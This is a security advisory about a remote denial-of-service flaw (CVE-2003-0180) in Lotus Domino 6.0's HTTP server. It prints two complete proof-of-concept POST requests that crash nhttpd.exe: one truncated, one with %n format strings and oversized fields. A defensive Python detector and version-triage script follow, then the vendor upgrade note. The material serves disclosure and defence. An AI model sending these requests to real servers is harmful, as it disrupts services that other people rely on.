IBM Lotus Domino Web Server HTTP POST Remote Denial of Service Vulnerability
Release date: 2003-02-17
Update date: 2003-03-04
Affected systems:
Lotus Domino 6.0
Unaffected systems:
Lotus Domino 6.0.1
Description:
BUGTRAQ ID: 6951
CVE ID: CVE-2003-0180
Lotus Domino Web Server is a commercial HTTP server that provides a range of services, including email, and runs on Linux/Unix and Microsoft Windows.
Lotus Domino Web Server does not correctly handle malformed HTTP POST requests. A remote attacker can crash nhttpd.exe with either an incomplete POST request or a POST request whose fields carry invalid values, resulting in a denial of service.
The attacker therefore has two routes to a denial of service against the Lotus Domino web server: an incomplete POST request, or a POST request containing fields with invalid values. See the test method below for the specific requests.
<* Source: Mark Litchfield (mark@ngssoftware.com)
Link: http://www[.]nextgenss[.]com/advisories/lotus-60dos.txt
*>
Test method:
WARNING
The following program (method) may be of an offensive nature and is provided for security research and teaching only. Use at your own risk!
1. Incomplete POST request (the request body below is line-wrapped for display; on the wire it is sent as a single line after the blank line that ends the headers):
POST /test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,s_NotesForm;JournalEntry
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ngssoftware
Content-Length: 8111
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&NMCount:0&CalView:D; iwaSSL=0

Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BPE%27%5D%26%26%26
function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+
true%3B+return+false%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5B
this.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.
length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var
+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+
%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this
%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26
%26%26putAway%5B%27Ib%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf
%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27
Ib%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length
%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28
this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27Ub%27%5D%2
6%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%
3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BNT%27%5D%26
%26%26function+%28index%29%7Bvar+len%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return
%3B+for%28var+i%3Dindex%3Bi%3Clen-1%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7D%26%26
%26putAway%5B%27folderStorage%27%5D%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D
0%3Bk%3CaRemove.length%3Bk%2B%2B%29%7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3B
i--%29+if%28this%5Bi%5D+%3D%3D+name%29%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3D
this%5Bj%2B1%5D%3B+this.length+--%3B+if%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%2
7folderStorage%27%5D%5B%27dz%27%5D%26%26%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%
29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%
27BPE%27%5D%26%26%26function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3
D%3D+name%29+return+true%3B+return+false%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BSU%27%5D%26%26
%26function+%28obj%29%7Bthis%5Bthis.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BQV%
27%5D%26%26%26function+%28fnEquals%29%7Bif+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3
Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+
this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks
%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%
3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue
%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27addUnique%27%5D%26%26%26
function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5
D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27indexOf%27%5D%26%26%26function%2
8vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fn
Compare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D
%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27Ub%27%5D%26%26%26function%28start2C+len%29%7
Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-
%3D+len%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BNT%27%5D%26%26%26function+%28index%29%7Bvar+len
%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return%3B+for%28var+i%3Dindex%3Bi%3Clen-1
%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D
%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D0%3Bk%3CaRemove.length%3Bk%2B%2B%29%
7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3Bi--%29+if%28this%5Bi%5D+%3D%3D+name%2
9%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3Dthis%5Bj%2B1%5D%3B+this.length+--%3B+if
%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27dz%27%5D%26%2
6%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%
29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BPE%27%5D%26%26%26function+%28name%29%
7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+true%3B+return+false%
3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5Bthis.length
%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length
%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%
3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%
22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%2
9%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putA
way%5B%27folderPageUnid%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexO
f%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27
folderPageUnid%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C
+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7D
else%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderPageUni
d%27%5D%5B%27Ub%27%5D%26%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B
%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27selectedFolderIn
dex%27%5D%26%26%260%26%26%26putAway%5B%27BSi%27%5D%26%26%26%26%26%26&h_EditAction=h_Next&h_SetEditCurrentScen
e=s_StdPageEdit&h_SetPublishReaders=&h_AlternateName=&h_CurrentFolderDocument=&h_CurrentFolderName=&h_SetEdit
NextScene=h_StdPageEditImage&h_SetReturnURL=&h_ReturnToPage=&h_NoSceneTrail=0&h_SetCommand=h_ShimmerSave&h_Se
tSaveDoc=1&s_MailSendReturnPage=&s_MailViewBefore=&h_SetPublishToFolder=&h_Name=foobar&h_SetPublishAction=&h_
EditSceneTrail=&h_WorkflowStage=&h_IsConflict=&h_DictionaryId=&From=Anonymous&Principal=Anonymous%25n%25n%25n
%25n%25n&Form=JournalEntry&Subject=foobar&Categories=testcat&h_RichTextItem=Body&Body=%3Cdiv%3Eghhgh%3CSPAN%3
E%3C%2FSPAN%3E%3C%2Fdiv%3E&h_CurrentPosition=40%2501%25u0103%2514%2501%2501%2501%2501%2501%2503%2501%2503%250
1%2501%2501%2501%2501%250C%2501%2506ihiih%25uE7F9%25u019F%25uE7F5%25u019F%25u9021%25u637F%25uAE47%25u6359%25u
AE5C%25u6359%25u9021%25u637F%2511%2501%2503%2501&h_ImageURL=&h_HeadlineText=&h_ImageCount=0&h_NewImageCount=0
&h_HeadlineCount=0&h_LinkURL=&h_LinkTitle=&h_PageText=&s_ImageUseCidRef=&s_EmbeddedImageInfo=&s_CidImageInfo=
&s_ConvertImage=0&FontNames=3&FontSize=2&HaikuEditorPlainTextArea=&s_UsePlainText=0&s_PlainEditor=0&h_Attachm
entTimes=&h_AttachmentNamesAlt=&h_AttachmentLengthsAlt=&h_AttachmentOldNames=
2. POST request containing fields with invalid values (body line-wrapped for display, as above):
POST /test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEdit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,s_NotesForm;ShimmerMailPref
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)
Host: 192.168.0.1
Content-Length: 2548
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20030115T020722%2C40Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iwaSSL=0

%25%25PostCharset=ISO-8859-1&&EXCLUDEFROMVIEW=null&s_BrowserSuffix=mybrowser&h_CurrentSkinName=me&h_CurrentSki
nType=myskin&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg&s_UNH=qwerty&VAL_ExpandGroup=0&VAL_Type=1&VAL_Exhaustive=1&VAL
_DoConflictCheck=1&VAL_UNID=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&VAL_Invitees=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&VAL_Dat
eTimeList=DDDDDDDDDDDDDDDDDDDDDDDDDDD&Data=liberty&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA=washere
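The Python below is an added example; it is not part of this advisory or of NGSSoftware's proof of concept, and it sends nothing to a server. It covers the checks a practitioner wants next to the two requests above: a detector for the request traits they rely on (a POST whose declared Content-Length exceeds the body actually delivered, as in the first request; a field name sent more than once, %n sequences in a value, and oversized field names or values, as in the second), and a Server-banner triage so exposure can be judged without crashing the HTTP task. The host 192.168.0.1 and the request path are taken from the requests above; the sample requests are constructed here and only mirror the shape of the payloads, the 1024-byte size threshold is an arbitrary choice, and the banner format "Lotus-Domino/<version>" with an optional "Release-" prefix is an assumption made for this example, not something this page states.

```python
"""Triage helpers for the Domino 6.0 POST denial-of-service conditions above.

Added example, not from the advisory. It inspects captured requests and
Server banners; it does not send traffic.
"""
import re
from urllib.parse import parse_qsl


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:                        # tolerate bare-LF captures
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").split("\n")
    request_line = lines[0].rstrip("\r")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.rstrip("\r").partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def is_incomplete_post(raw: bytes) -> bool:
    """True when a POST declares more body bytes (Content-Length) than it delivered.

    This is the shape of the first request above.
    """
    request_line, headers, body = parse_http_request(raw)
    if not request_line.upper().startswith("POST "):
        return False
    try:
        declared = int(headers.get("content-length", "0"))
    except ValueError:
        return True                    # a non-numeric length is malformed on its own
    return len(body) < declared


FORMAT_SPEC = re.compile(r"%n")        # parse_qsl decodes one layer, so %25n also becomes %n


def suspicious_form_fields(body: bytes, max_len: int = 1024):
    """Return (field, reason) pairs for the traits the second request relies on:
    a field name sent more than once, %n sequences in a value, and names or
    values longer than max_len (1024 is an arbitrary threshold)."""
    pairs = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    findings, seen = [], {}
    for name, value in pairs:
        label = name if len(name) <= 40 else name[:40] + "..."
        seen[name] = seen.get(name, 0) + 1
        if seen[name] == 2:
            findings.append((label, "repeated field"))
        if FORMAT_SPEC.search(value):
            findings.append((label, "format specifier %n"))
        if len(name) > max_len:
            findings.append((label, "oversized field name"))
        if len(value) > max_len:
            findings.append((label, "oversized value"))
    return findings


# Assumed banner format; Domino deployments can also suppress the version entirely.
BANNER_RE = re.compile(r"Lotus-Domino/(?:Release-)?(\d+(?:\.\d+)*)", re.IGNORECASE)


def domino_version_status(server_header: str):
    """Classify a Server: banner against this advisory.

    'affected' for the 6.0 release named as vulnerable, 'not affected' for the
    6.0.1 fix, a 'not covered' string for any other Domino release, and None
    when the banner is not a Domino banner at all.
    """
    match = BANNER_RE.search(server_header)
    if match is None:
        return None
    version = tuple(int(part) for part in match.group(1).split("."))
    if version == (6, 0):
        return "affected"
    if version == (6, 0, 1):
        return "not affected"
    return "not covered by this advisory"


POC_PATH = "/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry"


def build_post(path: str, body: bytes, declared_length=None) -> bytes:
    """Assemble a minimal POST; declared_length, when given, overrides the true length."""
    length = len(body) if declared_length is None else declared_length
    head = (f"POST {path} HTTP/1.1\r\nHost: 192.168.0.1\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {length}\r\n\r\n")
    return head.encode("latin-1") + body


# Constructed samples that mirror the shape of the two requests above, not the full payloads.
SHORT_BODY = b"Form=JournalEntry&Subject=foobar&Principal=Anonymous%25n%25n%25n"
INCOMPLETE_POST = build_post(POC_PATH, SHORT_BODY, declared_length=8111)   # first request shape
COMPLETE_POST = build_post(POC_PATH, SHORT_BODY)                            # benign control
BAD_FIELDS_BODY = (b"%25%25PostCharset=ISO-8859-1&&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg"
                   b"&s_UNH=qwerty&VAL_UNID=" + b"B" * 30 + b"&Data=liberty&"
                   + b"A" * 2000 + b"=washere")                              # second request shape

if __name__ == "__main__":
    print("incomplete:", is_incomplete_post(INCOMPLETE_POST), is_incomplete_post(COMPLETE_POST))
    for field, reason in suspicious_form_fields(BAD_FIELDS_BODY):
        print(f"{reason}: {field}")
    for banner in ("Lotus-Domino/6.0", "Lotus-Domino/Release-6.0.1", "Apache/2.4"):
        print(banner, "->", domino_version_status(banner))
```

When captured traffic is all you have, run suspicious_form_fields over the decoded body of each POST to an .nsf path and is_incomplete_post over requests whose connection closed before the declared length arrived; both requests above trip at least one check. Prefer the banner check to replaying the requests when the goal is only to confirm that a server still runs 6.0.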
Recommendation:
Vendor patch:
Lotus
-----
The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
IBM Lotus Domino 6.0.1 upgrade
http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k=&dt=&go=y&rs=ESD-DMNTSRVRi&S_TACT=&S_CMP=&sb=r